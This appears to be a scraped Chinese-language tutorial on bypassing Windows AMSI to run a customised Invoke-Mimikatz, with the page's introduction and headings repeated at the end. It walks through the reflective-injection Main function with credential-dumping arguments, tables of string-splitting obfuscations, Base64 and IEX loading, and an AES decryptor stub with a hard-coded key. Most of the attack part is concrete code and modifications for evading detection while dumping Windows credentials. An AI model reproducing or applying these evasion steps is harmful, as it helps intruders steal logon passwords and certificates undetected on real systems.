手工绕过AMSI - 第二部分：构建无触发器的Invoke-Mimikatz<\/h1>

0x00 介绍<\/h2>
本文深入探讨AMSI更深层的触发器机制，重点讲解如何构建一个没有AMSI触发器的定制版Invoke-Mimikatz脚本。文章将详细介绍Invoke-Mimikatz的工作原理，以及如何通过手动修改绕过AMSI检测。<\/p>

0x01 Invoke-Mimikatz工作原理<\/h2>

基本构成<\/h3>

Invoke-Mimikatz实际上是以下两个组件的组合：<\/p>

Joe Bialek的Invoke-ReflectivePEInjection脚本<\/li>

Benjamin DELPY的Mimikatz代码<\/li> <\/ol>

核心机制<\/h3>

Invoke-Mimikatz的主要功能是将Mimikatz的Base64编码二进制文件通过反射加载方式注入到当前或远程进程内存中执行。这种技术特点包括：<\/p>

不会在磁盘上留下文件<\/li>
不会在进程DLL列表中显示<\/li>

支持远程进程注入<\/li> <\/ul>

主函数分析<\/h3>

Function<\/span> Main {
<\/span><\/span>    # 调试模式设置<\/span>
<\/span><\/span>    if<\/span> (($PSCmdlet.MyInvocation.BoundParameters["Debug"<\/span>] -ne<\/span> $null) -and<\/span> $PSCmdlet.MyInvocation.BoundParameters["Debug"<\/span>].IsPresent) {
<\/span><\/span>        $DebugPreference = "Continue"<\/span>
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    # 设置Mimikatz执行参数<\/span>
<\/span><\/span>    if<\/span> ($PsCmdlet.ParameterSetName<\/span> -ieq<\/span> "DumpCreds"<\/span>) {
<\/span><\/span>        $ExeArgs = "sekurlsa::logonpasswords exit"<\/span>
<\/span><\/span>    }
<\/span><\/span>    elseif<\/span> ($PsCmdlet.ParameterSetName<\/span> -ieq<\/span> "DumpCerts"<\/span>) {
<\/span><\/span>        $ExeArgs = "crypto::cng crypto::capi <\/span>`"<\/span>crypto::certificates \/export<\/span>`"<\/span> <\/span>`"<\/span>crypto::certificates \/export \/systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE<\/span>`"<\/span> exit"<\/span>
<\/span><\/span>    }
<\/span><\/span>    else<\/span> {
<\/span><\/span>        $ExeArgs = $Command
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    # 加载并执行Mimikatz<\/span>
<\/span><\/span>    $PEBytes64 = 'TVqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAA...'<\/span> # x64版本Base64<\/span>
<\/span><\/span>    $PEBytes32 = 'TVqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAA...'<\/span> # x86版本Base64<\/span>
<\/span><\/span>    
<\/span><\/span>    if<\/span> ($ComputerName -eq<\/span> $null -or<\/span> $ComputerName -imatch<\/span> "^\s*$"<\/span>) {
<\/span><\/span>        Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, "Void"<\/span>, 0, ""<\/span>, $ExeArgs)
<\/span><\/span>    }
<\/span><\/span>    else<\/span> {
<\/span><\/span>        Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, "Void"<\/span>, 0, ""<\/span>, $ExeArgs) -ComputerName $ComputerName
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>0x02 绕过AMSI检测的步骤<\/h2>
第一步：处理Invoke-ReflectivePEInjection触发器<\/h3>

重命名函数<\/strong>：将Invoke-ReflectivePEInjection<\/code>改为PE-Reflect<\/code>等不常见的名称<\/li>
识别并修改关键触发器<\/strong>：<\/li>
<\/ol>



原始值<\/th>
修改后值<\/th>
<\/tr>
<\/thead>


Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect<\/code><\/td>
Add-Member NoteProperty -Name $('Vi'+'rt'+'ual'+'Pro'+'te'+'ct') -Value $VirtualProtect<\/code><\/td>
<\/tr>

Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory<\/code><\/td>
Add-Member -MemberType $('No'+'te'+'Pr'+'op'+'er'+'ty') -Name $('Wr'+'ite'+'Proc'+'ess'+'Mem'+'or'+'y') -Value $WriteProcessMemory<\/code><\/td>
<\/tr>

$ProcessHandle<\/code><\/td>
$ProcHandle<\/code><\/td>
<\/tr>

$StartAddress<\/code><\/td>
$FirstAddress<\/code><\/td>
<\/tr>

-ProcessHandle<\/code><\/td>
-ProcHandle<\/code><\/td>
<\/tr>

-StartAddress<\/code><\/td>
-FirstAddress<\/code><\/td>
<\/tr>

.FileType -ieq "DLL"<\/code><\/td>
.FileType -ieq $('D'+'L'+'L')<\/code><\/td>
<\/tr>
<\/tbody>
<\/table>

编码Main函数<\/strong>：将Main函数内容Base64编码并通过IEX加载<\/li>
<\/ol>
IEX($([Text.Encoding]<\/span>::Unicode.GetString([Convert]<\/span>::FromBase64String("CQBpAGYAIAAoACgAJABQAFMAQw..."<\/span>))))
<\/span><\/span><\/code><\/pre>第二步：处理Mimikatz二进制触发器<\/h3>
由于Mimikatz二进制本身包含AMSI触发器，需要对其进行加密处理：<\/p>

加密方法<\/strong>：使用AES加密算法<\/li>
加密实现<\/strong>：<\/li>
<\/ol>
$powerdecrypt = @"
<\/span><\/span><\/span>using System;
<\/span><\/span><\/span>using System.Text;
<\/span><\/span><\/span>using System.IO;
<\/span><\/span><\/span>using System.Security.Cryptography;
<\/span><\/span><\/span>using System.IO.Compression;
<\/span><\/span><\/span>namespace powerdecrypt {
<\/span><\/span><\/span>    public class Program {
<\/span><\/span><\/span>        public static byte[] AES_Decrypt(byte[] bytesToBeDecrypted, byte[] passwordBytes) {
<\/span><\/span><\/span>            \/\/ AES解密实现
<\/span><\/span><\/span>        }
<\/span><\/span><\/span>        public static byte[] Decompress(byte[] data) {
<\/span><\/span><\/span>            \/\/ GZip解压实现
<\/span><\/span><\/span>        }
<\/span><\/span><\/span>        public static byte[] Base64_Decode(string encodedData) {
<\/span><\/span><\/span>            \/\/ Base64解码实现
<\/span><\/span><\/span>        }
<\/span><\/span><\/span>        public static string decrypt(params string[] args) {
<\/span><\/span><\/span>            \/\/ 解密主函数
<\/span><\/span><\/span>        }
<\/span><\/span><\/span>    }
<\/span><\/span><\/span>}
<\/span><\/span><\/span>"@<\/span>
<\/span><\/span>Add-Type -TypeDefinition $powerdecrypt
<\/span><\/span><\/code><\/pre>
使用加密数据<\/strong>：<\/li>
<\/ol>
$DecryptedMimix64 = [powerdecrypt.Program]<\/span>::decrypt($EncryptedMimix64,"S3cur3Th1sSh1t"<\/span>)
<\/span><\/span>$PortableExecutableBytes64 = [regex]<\/span>::match($DecryptedMimix64,'(?<=#).*?(?=#)'<\/span>).Value
<\/span><\/span><\/code><\/pre>第三步：处理Invoke-Mimikatz触发器<\/h3>

重命名函数<\/strong>：将Invoke-Mimikatz<\/code>改为Invoke-CustomKatz<\/code><\/li>
修改关键字符串<\/strong>：<\/li>
<\/ol>



原始值<\/th>
修改后值<\/th>
<\/tr>
<\/thead>


"sekurlsa::logonpasswords exit"<\/code><\/td>
'se'+'ku'+'rl'+'sa'+'::'+'lo'+'go'+'np'+'asswor'+'ds ex'+'it'<\/code><\/td>
<\/tr>

Reflection.AssemblyName('ReflectedDelegate')<\/code><\/td>
Reflection.AssemblyName('Re'+'fl'+'ect'+'edD'+'ele'+'gat'+'e')<\/code><\/td>
<\/tr>

'powershell_reflective_mimikatz'<\/code><\/td>
$('po'+'wer'+'she'+'ll_'+'ref'+'lec'+'tiv'+'e_m'+'imi'+'ka'+'tz')<\/code><\/td>
<\/tr>

DumpCreds<\/code><\/td>
GetCreds<\/code><\/td>
<\/tr>

DumpCerts<\/code><\/td>
GetCerts<\/code><\/td>
<\/tr>

$RemoteScriptBlock<\/code><\/td>
$NoLocalScriptBlock<\/code><\/td>
<\/tr>

$PEBytes64<\/code><\/td>
$PortableExecutableBytes64<\/code><\/td>
<\/tr>

$PEBytes32<\/code><\/td>
$PortableExecutableBytes32<\/code><\/td>
<\/tr>

$PEBytes<\/code><\/td>
$PortableExecutableBytes<\/code><\/td>
<\/tr>

-PEBytes<\/code><\/td>
-PortableExecutableBytes<\/code><\/td>
<\/tr>
<\/tbody>
<\/table>
0x03 注意事项与结论<\/h2>

内存扫描问题<\/strong>：即使绕过AMSI，Windows Defender仍可能通过内存扫描检测到未混淆的Mimikatz<\/li>
进程终止<\/strong>：内存扫描触发后约2秒，PowerShell进程会被终止<\/li>
长期解决方案<\/strong>：修改Mimikatz源代码构建定制版本是更持久的解决方案<\/li>
<\/ol>
关键结论<\/h3>

了解工具工作原理是有效绕过的前提<\/li>
AMSI主要依赖签名检测，手动修改可以绕过<\/li>
加密\/编码敏感部分是有效的绕过技术<\/li>
未来可能需要结合多种技术（AMSI绕过+内存混淆）实现持久性<\/li>
<\/ol>
通过这种方法，我们成功构建了一个不被AMSI标记的Invoke-Mimikatz版本，展示了手动修改在绕过安全检测中的有效性。<\/p>

手工绕过AMSI - 第二部分：构建无触发器的Invoke-Mimikatz<\/h1>

0x00 介绍<\/h2> 本文深入探讨AMSI更深层的触发器机制，重点讲解如何构建一个没有AMSI触发器的定制版Invoke-Mimikatz脚本。文章将详细介绍Invoke-Mimikatz的工作原理，以及如何通过手动修改绕过AMSI检测。<\/p>

0x01 Invoke-Mimikatz工作原理<\/h2>

0x02 绕过AMSI检测的步骤<\/h2>

0x00 介绍<\/h2>
本文深入探讨AMSI更深层的触发器机制，重点讲解如何构建一个没有AMSI触发器的定制版Invoke-Mimikatz脚本。文章将详细介绍Invoke-Mimikatz的工作原理，以及如何通过手动修改绕过AMSI检测。<\/p>